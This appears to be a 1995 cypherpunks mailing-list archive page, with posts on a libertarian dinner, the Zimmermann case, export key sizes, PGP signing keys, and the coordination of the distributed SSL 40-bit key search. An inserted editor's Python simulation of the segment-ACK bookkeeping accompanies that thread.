From zeus at pinsight.com Fri Sep 1 00:11:55 1995
From: zeus at pinsight.com (J. Kent Hastings)
Date: Fri, 1 Sep 95 00:11:55 PDT
Subject: Karl Hess meeting - L.A. area
Message-ID: <199509010711.AAA09927@utopia.pinsight.com>

-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

-----BEGIN PGP SIGNED MESSAGE-----

"Extremism in the defense of liberty is no vice, and let me remind you, moderation in the pursuit of justice is no virtue." -- Aristotle, and a Goldwater speechwriter, but not Karl Hess. Politically Barry's Boy, Karl was often credited with Goldwater's most famous line, but he denied it when interviewed. Karl did write books: Dear America, Community Technology, and Capitalism For Kids.

--- T H E   K A R L   H E S S   C L U B ---

now in its second year of almost monthly dinners, presents

The Perestroika Deception: The Phony "Collapse" of Communism

September's speaker is William (Bill) McIlhany, who will speak on Conspiracy Theory of the Soviet collapse, and may answer some questions about the Chemical Bank Takeover of Chase Manhattan, if we ask real nice.

The Karl Hess Club will meet Monday, September 18 at the Marie Callendar Restaurant in Marina Del Rey, 4356 Lincoln Boulevard (at the 90 Fwy). The program is free of charge, but if you care to dine, $13.00 covers everything including tax and tip, with the exception of alcoholic beverages. Cocktails at 7pm, Dinner at 7:30pm, Speaker at 8:30pm.

Dinner: $13.00 includes all you can eat buffet with Marie's Pot Roast. Vegetable, Salad Bar, Potato, Cornbread, Apple, Lemon and Pumpkin Pies plus (Soft) beverages included. Order alcoholic beverages on your own, cash & carry.

No reservations are necessary, but for more information, you are welcome to contact Mike Everling at (213) 225-3405.

In order to get to the restaurant, take the Marina (90) Freeway West until it ends at Lincoln Boulevard. Turn right at Lincoln and right again into the parking lot of the restaurant - it's just at the corner.
Inside the restaurant, go upstairs to the meeting room.

The program for October 16 is still in development. The venue will again be Marie Callendar in MDR, with the tentatively scheduled speaker to be Dr. John Hospers.

Want to make sure you are on the Karl Hess Club mailing list? Leave a message at (310) 289-4126, e-mail at agorist003 at aol.com, or write The Agorist Institute, 291 S. La Cienega Blvd., #749, Beverly Hills, CA 90211. Browse our Web page -- http://www.pinsight.com/~zeus/agorist/

For tax deduction, make donations payable to The Agorist Institute.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEYh6zTxxI221vktAQFYDwP/chaMpCMb8kxpg2oo/AOi+ybiZFe5KQCY
dJa8LKskqz6usBCuClhWfhvsyfwt5LOg3v9B8yRLiQR8kjHuUWNjkxY8WwsRUi3C
NKGW33EeplPEg2Rpv/pxWYqNICfYQa6j9xAUVPSPZbJD9HrWM+sJ7uJGuLMY0p48
4u/vppPSyHU=
=bvnM
-----END PGP SIGNATURE-----

From gjeffers at socketis.net Fri Sep 1 00:14:48 1995
From: gjeffers at socketis.net (Gary Jeffers)
Date: Fri, 1 Sep 95 00:14:48 PDT
Subject: FUHRMAN key escrow
Message-ID: <199509011002.FAA28046@mail.socketis.net>

FUHRMAN key escrow

Fuhrman seems to be a Godsend to us. He is helping to destroy the public's perceived legitimacy of state authority. If things keep moving the way they are, Fuhrman may join the names: John Crapper, Quisling, & Hooker. In which case, I propose the term, Fuhrman key escrow, to substitute for the term, mandatory state key escrow.

From gjeffers at socketis.net Fri Sep 1 00:17:18 1995
From: gjeffers at socketis.net (Gary Jeffers)
Date: Fri, 1 Sep 95 00:17:18 PDT
Subject: Phil Zimmermann/Amnesty International?
Message-ID: <199509011005.FAA28054@mail.socketis.net>

Phil Zimmermann/Amnesty International?

I was wondering if the Zimmermann case would be a proper concern of Amnesty International. Phil is obviously a political dissident. His persecution is obviously political. If Phil got support from Amnesty Int'l, then his persecution could be a big embarrassment to the Federal gov't.
He has a lot of supporters and taking up his cause could be a big promotional for Amnesty International. The Feds might feel forced to drop the matter early. Any ideas?

Gary Jeffers

From rsalz at osf.org Fri Sep 1 04:09:58 1995
From: rsalz at osf.org (Rich Salz)
Date: Fri, 1 Sep 95 04:09:58 PDT
Subject: sums with BIG numbers
Message-ID: <9509011109.AA15900@sulphur.osf.org>

>Volume 4 should be in print shortly.

All of Volume 4 or the first couple-hundred pages as a fascicle? Or have those plans changed?

From sinclai at ecf.toronto.edu Fri Sep 1 04:39:57 1995
From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N)
Date: Fri, 1 Sep 95 04:39:57 PDT
Subject: opinions on RSA Secure?
In-Reply-To:
Message-ID: <95Sep1.073743edt.1421@cannon.ecf.toronto.edu>

> I am a user of SecureDrive, and strongly support it. There is *no*
> interface required, once you log into the drive, *everything* operates
> totally transparent to the user.

I used to use it too. Sure, once you've got it set up and automated, it's transparent. But can you see J. Random User installing it?

> Always keep in mind that when the gov't doesn't mind the software being
> exported, they already know how to compromise it...Trust PGP, Hpack &
> SecureDrive...you won't be disappointed.

When last I looked, your government didn't allow the export of 80-bit cryptosystems. There is no argument that the 40-bit export version is breakable.

From droelke at rdxsunhost.aud.alcatel.com Fri Sep 1 05:27:47 1995
From: droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Fri, 1 Sep 95 05:27:47 PDT
Subject: SSL search attack
Message-ID: <9509011225.AA20540@spirit.aud.alcatel.com>

>
> I see nothing wrong with the concept of being allocated an initial chunk
> and having the scan software attempt to ACK it when 50% of it has been
> searched. A successful ACK would allow the releasing of a new chunk (in
> response) equal in size to the returned chunk.
> A failure of the Server to
> accept the ACK would trigger a retry at set intervals (such as 75% and 100%
> or 60/70/80/90/100%) until the Server responds. Thus the scanner is always
> in possession of a Full Sized Chunk to scan (so long as the Server accepts
> an ACK before the 100% done mark) and temporary failures will not stop the
> process of a scanner as currently happens.
>

The only way this can work is if the server is told it is a 50%/75%/etc size ACK, and then later the server is ACKed for the full 100%.

Why? Because what happens if the client dies immediately after doing the ACK - maybe only 51% of that space has been searched, yet the server has already seen an ACK for it.

IMO - a % ACK is too much complexity and extra work on the server, which is already having trouble keeping up.

Dan
------------------------------------------------------------------
Dan Oelke                      Alcatel Network Systems
droelke at aud.alcatel.com        Richardson, TX

From don at cs.byu.edu Fri Sep 1 06:00:13 1995
From: don at cs.byu.edu (don at cs.byu.edu)
Date: Fri, 1 Sep 95 06:00:13 PDT
Subject: Web of Trust
Message-ID: <199509011201.GAA01376@wero>

-----BEGIN PGP SIGNED MESSAGE-----

I am currently sorting through the PGP keyserver keyfile to extract a limited web of trust. I believe that current servers would be best to limit their keys in a similar fashion. Since we can't all have what we want without coding it ourselves, I'm doing the next best crappy imitation.

Anyways, I am trying to find keys that are actually relevant and inter-connected with signatures. Naturally, it won't be anywhere near complete or extensive, and will be a dog to update, but 5 meg keyfiles take a long time to search...

I am requesting that all "active" cypherpunks/cyphergroupies please send me their key number, IF it's already on the keyservers. If it's recently put there, be sure to tell me or I will be annoyed. If it's not there at all, I'll be annoyed. Personally annoyed, not I-ran-some-scriptfile annoyed.
If you searched any of the RC4 or SSL keyspace, for example, I'm interested. If you post messages occasionally, [conspiracypunks need not apply] I'm interested. If you generated a key because your neighbor taught you how, don't bother.

If anyone wants the keynumbers/script/entirekeyfile I could put it on ftp or something. Naturally, I'll be forwarding all results to the NSA quantum crack-o-matic.

Have a nice day. :)

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMEb1A8La+QKZS485AQGMKwL/Qzf67QSnn3iLZ7gCumfPcC/KqSyYSM0s
OknMHhGDLb74qSWBDRyM6pPdwIHOg+Pjpl53ruMSu9YhXQrjMHgZZUjFh6c7vhi2
c+j3BYQ87us0BRuoj9pu8/d89gG3vsv3
=3qRz
-----END PGP SIGNATURE-----

fRee cRyPTo! jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39)
June 7&14, 1995: 1st amendment repealed. Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *

From rkw at dataplex.net Fri Sep 1 06:13:28 1995
From: rkw at dataplex.net (Richard Wackerbarth)
Date: Fri, 1 Sep 95 06:13:28 PDT
Subject: SSL search attack
Message-ID:

At 7:25 AM 9/1/95, Daniel R. Oelke wrote:
>>
>> I see nothing wrong with the concept of being allocated an initial chunk
>> and having the scan software attempt to ACK it when 50% of it has been
>> searched. A successful ACK would allow the releasing of a new chunk (in
>> response) equal in size to the returned chunk. A failure of the Server to
>> accept the ACK would trigger a retry at set intervals (such as 75% and 100%
>> or 60/70/80/90/100%) until the Server responds. Thus the scanner is always
>> in possession of a Full Sized Chunk to scan (so long as the Server accepts
>> an ACK before the 100% done mark) and temporary failures will not stop the
>> process of a scanner as currently happens.
>>
>
>The only way this can work is if the server is told it is a 50%/75%/etc
>size ACK, and then later the server is ACKed for the full 100%.
>
>Why?
>Because what happens if the client dies immediately after doing
>the ACK - maybe only 51% of that space has been searched, yet
>the server has already seen an ACK for it.

You NEVER claim to have searched space until you have actually done so.

>IMO - a % ACK is too much complexity and extra work on the server,
>which is already having trouble keeping up.

No. The claim is that the server has no problem keeping up with acks. Besides, if it does, we simply insert a layer of "managers" to buffer the top management from being "bothered" too often.

You are making the "ACK" too complicated.

Assuming that you are multi-threaded--- Simply run two "workers" on the same machine. If there are delays in getting keys assigned, the two will soon get out of phase and keep the cpu busy.

----
Richard Wackerbarth
rkw at dataplex.net

From droelke at rdxsunhost.aud.alcatel.com Fri Sep 1 06:27:10 1995
From: droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Fri, 1 Sep 95 06:27:10 PDT
Subject: SSL search attack
Message-ID: <9509011325.AA20856@spirit.aud.alcatel.com>

>
> At 7:25 AM 9/1/95, Daniel R. Oelke wrote:
> >>
> >> I see nothing wrong with the concept of being allocated an initial chunk
> >> and having the scan software attempt to ACK it when 50% of it has been
> >> searched. A successful ACK would allow the releasing of a new chunk (in
> >> response) equal in size to the returned chunk. A failure of the Server to
> >> accept the ACK would trigger a retry at set intervals (such as 75% and 100%
> >> or 60/70/80/90/100%) until the Server responds. Thus the scanner is always
> >> in possession of a Full Sized Chunk to scan (so long as the Server accepts
> >> an ACK before the 100% done mark) and temporary failures will not stop the
> >> process of a scanner as currently happens.
> >>
> >
> >The only way this can work is if the server is told it is a 50%/75%/etc
> >size ACK, and then later the server is ACKed for the full 100%.
> >
> >Why?
> >Because what happens if the client dies immediately after doing
> >the ACK - maybe only 51% of that space has been searched, yet
> >the server has already seen an ACK for it.
>
> You NEVER claim to have searched space until you have actually done so.

That is exactly what I was arguing against - but the first sentence of what I quoted was saying was ok.

> Assuming that you are multi-threaded--- Simply run two "workers" on the
> same machine. If there are delays in getting keys assigned, the two will
> soon get out of phase and keep the cpu busy.
>

I kind of like that idea...

Dan
------------------------------------------------------------------
Dan Oelke                      Alcatel Network Systems
droelke at aud.alcatel.com        Richardson, TX

From rrothenb at ic.sunysb.edu Fri Sep 1 07:12:13 1995
From: rrothenb at ic.sunysb.edu (Deranged Mutant)
Date: Fri, 1 Sep 95 07:12:13 PDT
Subject: Phil Zimmermann/Amnesty International?
In-Reply-To: <199509011005.FAA28054@mail.socketis.net>
Message-ID: <199509011410.KAA20234@libws1.ic.sunysb.edu>

>
> I was wondering if the Zimmermann case would be a proper concern of
> Amnesty International. Phil is obviously a political dissident. His
> persecution is obviously political. If Phil got support from Amnesty
> Int'l, then his persecution could be a big embarrassment to the Federal
> gov't. He has a lot of supporters and taking up his cause could be a
> big promotional for Amnesty International. The Feds might feel forced
> to drop the matter early. Any ideas?
>

I've heard that A.I. does not discuss political persecution as much in the countries that are doing it, since they do not want to offend the powers-that-be in that country, though they will note a case in another country. (In other words, if A.I. did note the PRZ case they'd only discuss it outside the United States.)

This is just speculation though...
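[Editor's illustration, added to this archive page; it is not code from brloop, from any of the posters, or from the original list traffic.] The SSL search attack exchange earlier on this page (Rosenberg's proposal to ACK a chunk at the 50% mark, Oelke's objection that a client can die right after that ACK with only 51% of the chunk searched, and Wackerbarth's rule that you never claim space you have not actually searched) is really an argument about server bookkeeping. The constructed simulation below models only that bookkeeping: a toy keyspace of 1,000 keys handed out in segments of 100 (both assumed sizes, nothing like the real 2^40), a server that marks a segment searched only when it receives an ACK, and two client policies, one that ACKs at the halfway mark and one that holds a spare segment and ACKs only on completion (the two-segments-in-hand variant the thread also takes up). No key search is performed; a "searched key" is just a counter step. Killing a client partway through shows what the server ends up believing under each policy, and which keys it would then never reissue.

```python
"""Constructed simulation of the segment/ACK bookkeeping argued over in the
SSL search attack thread.  Editor's example, not code from the thread or from
brloop.  No key search happens here: "searching" a key is a counter step, and
the 1,000-key keyspace is a toy stand-in.  Assumed model: the server hands out
contiguous segments and marks one searched only when it receives an ACK."""

KEYSPACE = 1_000     # constructed toy keyspace size
SEGMENT = 100        # constructed segment size


class Server:
    """Tracks segments handed out and segments the clients claim are done."""

    def __init__(self, keyspace=KEYSPACE, segment=SEGMENT):
        self.keyspace, self.segment = keyspace, segment
        self.next_start = 0
        self.outstanding = set()   # allocated, not yet ACKed
        self.acked = set()         # what the server believes is fully searched

    def allocate(self):
        """Hand out the next unallocated segment, or None when exhausted."""
        if self.next_start >= self.keyspace:
            return None
        seg = (self.next_start, min(self.next_start + self.segment, self.keyspace))
        self.next_start = seg[1]
        self.outstanding.add(seg)
        return seg

    def ack(self, seg):
        """The server takes the client's word for it."""
        self.outstanding.discard(seg)
        self.acked.add(seg)

    def reclaim_unacked(self):
        """Segments never ACKed are the only ones the server knows to reissue."""
        lost = sorted(self.outstanding)
        self.outstanding.clear()
        return lost

    def believed_searched(self):
        return {k for a, b in self.acked for k in range(a, b)}


def client_ack_at_half(server, budget):
    """Rosenberg's scheme: ACK the current segment at the 50% mark and take the
    next one immediately.  `budget` is how many keys this client gets to search
    before it silently dies.  Returns the keys it really searched."""
    searched = set()
    current, pending = server.allocate(), None
    while current is not None:
        a, b = current
        for k in range(a, b):
            if budget == 0:
                return searched            # died mid-segment; nobody tells the server
            searched.add(k)
            budget -= 1
            if k == a + (b - a) // 2 - 1:  # half done: premature ACK
                server.ack(current)
                pending = server.allocate()
        current, pending = pending, None
    return searched


def client_ack_on_completion(server, budget):
    """Wackerbarth's rule with a prefetched spare: hold two segments, ACK one
    only after every key in it is searched, then top the spare back up."""
    searched = set()
    current, pending = server.allocate(), server.allocate()
    while current is not None:
        a, b = current
        for k in range(a, b):
            if budget == 0:
                return searched
            searched.add(k)
            budget -= 1
        server.ack(current)                # the claim is now actually true
        current, pending = pending, server.allocate()
    return searched


def false_claims(server, searched):
    """Keys the server believes searched that no client searched: a correct
    key sitting in this set would never be found, because nobody reissues it."""
    return server.believed_searched() - searched


def simulate(client, budget):
    """Run one client under one policy and report the server's view."""
    server = Server()
    searched = client(server, budget)
    return server, searched, false_claims(server, searched)


if __name__ == "__main__":
    for client in (client_ack_at_half, client_ack_on_completion):
        server, searched, bogus = simulate(client, budget=151)
        print(f"{client.__name__}: searched {len(searched)} keys, "
              f"server believes {len(server.believed_searched())}, "
              f"{len(bogus)} keys falsely marked done, "
              f"reclaimable segments {server.reclaim_unacked()}")
```

With a client that dies after 151 keys, the ACK-at-half policy leaves the server believing 200 keys are done while 49 of them were never looked at, and those 49 are not in the outstanding set, so they are never reissued; the ACK-on-completion policy with a spare segment loses nothing, because the partly searched segment is still outstanding and gets reissued. The prefetch is what keeps the client busy across the ACK round trip, which was the liveness concern the 50% ACK was meant to solve.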
From rrothenb at ic.sunysb.edu Fri Sep 1 07:12:28 1995
From: rrothenb at ic.sunysb.edu (Deranged Mutant)
Date: Fri, 1 Sep 95 07:12:28 PDT
Subject: FUHRMAN key escrow
In-Reply-To: <199509011002.FAA28046@mail.socketis.net>
Message-ID: <199509011412.KAA20264@libws1.ic.sunysb.edu>

> FUHRMAN key escrow
>
> Fuhrman seems to be a Godsend to us. He is helping to destroy the
> public's perceived legitimacy of state authority. If things keep moving
> the way they are, Fuhrman may join the names: John Crapper, Quisling,
> & Hooker. In which case, I propose the term, Fuhrman key escrow, to
> substitute for the term, mandatory state key escrow.

I think that the revelations of police corruption in Philadelphia (where police have admitted to setting-up hundreds of people) may have more effect than Fuhrman...

From asgaard at sos.sll.se Fri Sep 1 07:29:05 1995
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Fri, 1 Sep 95 07:29:05 PDT
Subject: FUHRMAN key escrow
In-Reply-To: <199509011002.FAA28046@mail.socketis.net>
Message-ID:

Gary Jeffers wrote:

> Fuhrman seems to be a Godsend to us. He is helping to destroy the
> public's perceived legitimacy of state authority. If things keep moving
> the way they are, Fuhrman may join the names: John Crapper, Quisling,
> & Hooker. In which case, I propose the term, Fuhrman key escrow, to
> substitute for the term, mandatory state key escrow.

The issue is apparently also teaching the US public to use CODE: 'I don't give a f-wording s-word how many times this c-word-sucker said the n-word as long as the DNA-tests say that the other son-of-a-b-word did it.'

Mats

From warlord at MIT.EDU Fri Sep 1 07:52:59 1995
From: warlord at MIT.EDU (Derek Atkins)
Date: Fri, 1 Sep 95 07:52:59 PDT
Subject: O.J. ObCrypto: Fuhrman's Folly Fans Fakery Fears...
In-Reply-To:
Message-ID: <9509011452.AA15088@l-slide.MIT.EDU>

> I do not think that PGP 2.x can easily (ie: Automatically) use one key for
> Signing and another for Encrypting a Message (it does both at the same time
> if you ask). If I "Clear Sign" a message and then Encrypt it, then I get
> the result but I'm not sure if doing the decrypt on such a message will
> automatically spot the signature and verify it (as would occur with a E+S
> pass).

Sure it can, and I know people who do. Here is what you do:

1) Generate two keys. First generate your encryption key, then generate your signature key. This way, your signature key will be placed first in your secret keyring, and it will be used by default. Alternatively, you could use two (slightly) different userIDs on the keys and put something in your config.txt

2) Extract the keys in reverse order into a single keyfile and then distribute that keyfile to people. This way, when it gets added to other people's keyrings, the encryption key will be placed first, and that will be used by default.

3) Proceed to use PGP normally. When you sign a message, it will find the signature key first and use that. When someone wants to encrypt to you, they will find the encryption key first. When verifying the signature or trying to decrypt the message, it uses the keyID to determine which key was used, so order does not matter.

The only problem is that if someone re-orders their keyring then this will no longer work. E.g., if the keys are added in the wrong order.

-derek

From Piete.Brooks at cl.cam.ac.uk Fri Sep 1 08:50:47 1995
From: Piete.Brooks at cl.cam.ac.uk (Piete Brooks)
Date: Fri, 1 Sep 95 08:50:47 PDT
Subject: SSL search attack
In-Reply-To: <9509011325.AA20856@spirit.aud.alcatel.com>
Message-ID: <"swan.cl.cam.:275380:950901154847"@cl.cam.ac.uk>

>>>> I see nothing wrong with the concept of being allocated an initial chunk
>>>> and having the scan software attempt to ACK it when 50% of it has been
>>>> searched.
>>>> A successful ACK would allow the releasing of a new chunk (in

>> You NEVER claim to have searched space until you have actually done so.
> That is exactly what I was arguing against - but the first sentence of what
> I quoted was saying was ok.

No -- If you ask for 2 segments, then when you are 50% done, it is OK to ACK the *FIRST* segment.

>> Assuming that you are multi-threaded--- Simply run two "workers" on the
>> same machine. If there are delays in getting keys assigned, the two will
>> soon get out of phase and keep the cpu busy.
> I kind of like that idea...

I thought of that, but:

1) for the same server load, it doubles the number of unACKed segments

2) if process A is lagging process B, then when process B finishes and is idle waiting for the server, process A will run faster and thus reduce the lag. This will make the processes drift into phase.

I'm not convinced one way or the other.

From lwp at mail.msen.com Fri Sep 1 09:15:52 1995
From: lwp at mail.msen.com (Lou Poppler)
Date: Fri, 1 Sep 95 09:15:52 PDT
Subject: SSL search attack
In-Reply-To:
Message-ID:

On Fri, 1 Sep 1995, Robert A. Rosenberg wrote:

> I see nothing wrong with the concept of being allocated an initial chunk
> and having the scan software attempt to ACK it when 50% of it has been
> searched. A successful ACK would allow the releasing of a new chunk (in
> response) equal in size to the returned chunk. A failure of the Server to

The ACK process and the allocation process are separate, and should remain so. They run on different servers, and they run as separate processes in the unix version of brloop. A little tweaking of brloop could allow pre-fetching of the next segment to search, without any effect on the ACK process. I dislike the idea of a client sending an ACK before it has searched the entire segment.

::::::::::::::::::::::::::::::::::::::
:: Lou Poppler                   :: No animals were harmed in the
:: http://www.msen.com/~lwp/     :: production of this message.
::::::::::::::::::::::::::::::::::::::

From m5 at dev.tivoli.com Fri Sep 1 09:49:10 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Fri, 1 Sep 95 09:49:10 PDT
Subject: SSL search attack
In-Reply-To: <9509011325.AA20856@spirit.aud.alcatel.com>
Message-ID: <9509011648.AA07795@alpha>

> > > ACK ACK
> > ACK
> > > ACK
> ACK

I've just kinda been watching this debate for a while, so I may well have missed some of the more interesting details; if so, I apologize for my noise in advance.

I work on a lot of commercial software under constraints of scalability much like the SSL "attack server" being discussed here. My instincts tell me that in this situation the whole process would be *much* simpler if the basic idea of keeping the central server (or the family of distributed servers in those models) completely "informed" by all the attacking clients were abandoned. Tim May's "random attack" idea was extremely attractive, I thought. However, I think that it'd be possible to take advantage of the fact that the keyspace itself is basically constant (until the keysize is increased in the protocol under attack, of course). I mean, 40 bits is 40 bits. Similarly, the capacity of most clients will be fairly consistent. (I have access (in theory, of course; don't mention this to my management) (hi todd) to a hundred or so CPU's here, and that doesn't really change too often.)

Rather than apportion the search space out dynamically on each attack, why not simply allow attack clients to "subscribe" on a semi-permanent basis? All the server would have to do is make batches of ciphertext available for cracking. When a request comes in from a subscriber for a copy of some ciphertext, the server knows (or at least can legitimately suspect) that that subscriber's already-known keyspace will be searched.
As far as getting acknowledgements of search completion, again the server can by inference assume that (based on the prior establishment of client capabilities) after a pre-determined period of time the key sub-space will have been searched. It might be appropriate for clients to send back NACK messages, in case for example somebody shuts down the client's network unexpectedly. Assuming this goes pretty smoothly one would hope that the number of failures would be considerably smaller than the number of successes.

Again, ignore me if I'm blind to something obvious.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX     |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From sjb at austin.ibm.com Fri Sep 1 09:57:15 1995
From: sjb at austin.ibm.com (Scott Brickner)
Date: Fri, 1 Sep 95 09:57:15 PDT
Subject: SSL search attack
In-Reply-To: <9509011225.AA20540@spirit.aud.alcatel.com>
Message-ID: <9509011655.AA11645@ozymandias.austin.ibm.com>

Daniel R. Oelke writes
>The only way this can work is if the server is told it is a 50%/75%/etc
>size ACK, and then later the server is ACKed for the full 100%.
>
>Why? Because what happens if the client dies immediately after doing
>the ACK - maybe only 51% of that space has been searched, yet
>the server has already seen an ACK for it.
>
>IMO - a % ACK is too much complexity and extra work on the server,
>which is already having trouble keeping up.

I agree. ACKing partial segments is a bad idea. But, when a client is given a block of segments, partial ACKing can let poorly connected clients communicate with the server via e-mail, and still stay busy. When the client completely finishes half of its segments, it ACKs them and asks for that many more segments.
The fraction can be adjusted as mean communications latency to the server is measured. Ideally the new segments arrive just as the client finishes the second half of its original segments. This way the segments are allocated as late as possible, letting better connected clients have a better shot at them.

From stewarts at ix.netcom.com Fri Sep 1 10:12:06 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 1 Sep 95 10:12:06 PDT
Subject: opinions on RSA Secure?
Message-ID: <199509011708.KAA11239@ix8.ix.netcom.com>

>> The fact that the key is only 80 is *major* compromise. I would
>> recommend that package to no-one. With only an 80 bit key you don't
>> *need* trapdoors, granted they may be more "convenient" but the fact is
>> the 80 key *can* [and certainly will] be broken...

80 is an interesting number. Clipper-sized :-) It's much less than 128, which seems to be popular for other software and works well with MD5-based random session key generators. It's also interestingly bigger than 64, which the Feds are trying to tell us is good enough for non-government work. Are RSA giving in to the Feds? Or are they trying to up the bid, at least allowing us something as good as Clipper if we can't get 128? Not my poker game.

Let's look at some threat models. It's probably more than strong enough for any data you're willing to keep on a machine running MS-DOS, where serious attackers will go around it; it's about right for random "left your laptop in the airport" security, and for business use, if the police are going to confiscate your machine, they can probably subpoena the keys from somebody in your company anyway. Random hackers aren't going to be able to crack it, unlike 40-48 or maybe 56. It's big enough that the NSA probably can't break it right now, but in 10-20 years of computer speed growth they'll be able to if they want.
It's probably fine for dealing with amounts less than $1-100M for maybe 10 years, and for misdemeanors and light felonies if you're not using the key escrow :-) And in 5 years, you'll be using a different operating system (even if it _is_ named "Windows"), so you'll need a new version, and you can re-encrypt your data when you move it to a decent-sized disk instead of that wimpy 9GB mechanical drive. Anybody who's got a 5-year-old dump of your system has probably stolen any secrets you care about long since anyway.

#---
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From stewarts at ix.netcom.com Fri Sep 1 10:12:16 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 1 Sep 95 10:12:16 PDT
Subject: A problem with anonymity
Message-ID: <199509011708.KAA11228@ix8.ix.netcom.com>

Scott Brickner's example has fairly close analogies today. Corporations, cash, and assets with variable value are already useful. Alice is the dying parent who runs a business or has a good credit-rating. Bob is the irresponsible kid, Carol is the about-to-be unlucky creditor. Alice borrows lots of money from Carol, tells Bob that it's in the mattress / numbered Swiss Bank Account / collection of $$$$ artwork at home. Alice dies, and Bob absconds with the money (probate isn't needed for Swiss bank accounts or unrecorded stuff in mattresses) or sells the paintings to the highest bidder of Dave, Eve, and Freddie (with a bribe to all of them, and a kickback from Dave when he finally sells the painting for its real value.) (Or maybe it's not bribery and kickbacks, he's just a major shareholder in the Glorkspitz corporation, which is a major shareholder in their businesses.) Carol is stuck trying to get money out of The Alice Estate, which turns out to be surprisingly broke.
If she lent the money to The Alice Company (which looks more creditworthy than Chronologically Challenged Widow Alice), Alice would have had to leave Bob the yellow-sticky with the store safe combination instead of leaving the cash in her mattress.

Now, one reason we have probate courts is to try to stop this sort of fraud, making sure creditors get paid and heirs get their shares. Another reason, of course, is to make sure "Uncle" Sammy gets to inherit part of it, even though he's not a relative. (That's of course one of the reasons for having Swiss bank accounts you didn't remember to mention on your tax forms, fireproof mattresses, foreign corporations, and friends in the art dealer business :-)

Does good anonymity make this easier? Sure. And if all the heirs are cooperative, they can conspire to rip off their parents' creditors, if they're dishonest, or at least to avoid taxes, if they're not tax-believers. Of course, if they're dishonest, they'll have plenty of opportunities without having anybody die, and that'll probably affect bankruptcy law and increase Federal self-justification for watching the money supply long before anonymous estate ripoffs become common.

#---
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From m5 at dev.tivoli.com Fri Sep 1 10:22:29 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Fri, 1 Sep 95 10:22:29 PDT
Subject: SSL search attack
In-Reply-To: <9509011648.AA07795@alpha>
Message-ID: <9509011721.AA07870@alpha>

Scott Brickner writes:
> I think your assumption that available CPU is approximately constant
> is incorrect. Different participants have different constraints...

Hmm. I suppose that's probably true for some more than others. Again, hmm.

> Also, the "subscription" process is somewhat discouraging to those
> who participate for the prize.

Ah. That looks like one of those little details that got by me.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX     |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From rudy at bnr.ca Fri Sep 1 10:32:48 1995
From: rudy at bnr.ca (rudy (r.) rawlins)
Date: Fri, 1 Sep 95 10:32:48 PDT
Subject: Phil Zimmermann/Amnesty International?
Message-ID: <"8983 Fri Sep 1 11:17:28 1995"@bnr.ca>

In message "Phil Zimmermann/Amnesty International?", rrothenb at ic.sunysb.edu writes:
>
> >
> > I was wondering if the Zimmermann case would be a proper concern of
> > Amnesty International.
[snip]
> >
>
> I've heard that A.I. does not discuss political persecution as much in
> the countries that are doing it, since they do not want to offend the
> powers-that-be in that country, though they will note a case in another
> country. (In other words, if A.I. did note the PRZ case they'd only
> discuss it outside the United States.)
>
> This is just speculation though...
>

You're right on the speculation; A.I. has no such policy. As a matter of fact, they will meet face to face with government officials to seek the release of 'prisoners of conscience' - which is a possible category for Phil Z. Though Phil, despite what we may think, is not a prisoner, yet..

From tcmay at got.net Fri Sep 1 11:13:21 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 1 Sep 95 11:13:21 PDT
Subject: Fuhrman needed a digital pseudonym!
Message-ID:

Before you folks jump on the "racist" Mark Fuhrman, think about the "surveillance state" issues. While it was not any government organization that taped Fuhrman's comments, there are some real issues involved in how deeply and how far back we want to "mine" comments made by people. Some real issues of privacy.
The Mark Fuhrmans of the future may be interested in using technologies to protect their privacy, to give them "plausible deniability" should their recorded words come back to haunt them.

Brief comments:

* This post is primarily about the role of pseudonyms, not the OJ trial or the testimony/tapes involving Mark Fuhrman.

* And the issue of "mining" of ancient records, especially as technology makes the recording of sounds, the taping of sights, and the archiving of electronic messages so much easier.

* Those who think this is off-topic because it has nothing to do with coding in C are hereby invited to hit the "D" key, or whatever passes for it, right now.

Caveat: I've watched entirely too much of the OJ trial on CNN, as I sit here at home and surf the Net every morning. It's easy to have the television on, and the OJ trial has had many interesting twists. When the stuff gets boring, I switch to music or perhaps to the financial network CNBC. So, I've seen nearly everything being talked about here.

Opinion on OJ: ***elided by Tim to head off debates about OJ's guilt or innocence***. (I state this to show my prejudices, not to start an "OJ debate" on this list. Actually, I just elided (deleted) the opinion I had expressed, so as not to inflame anyone here.)

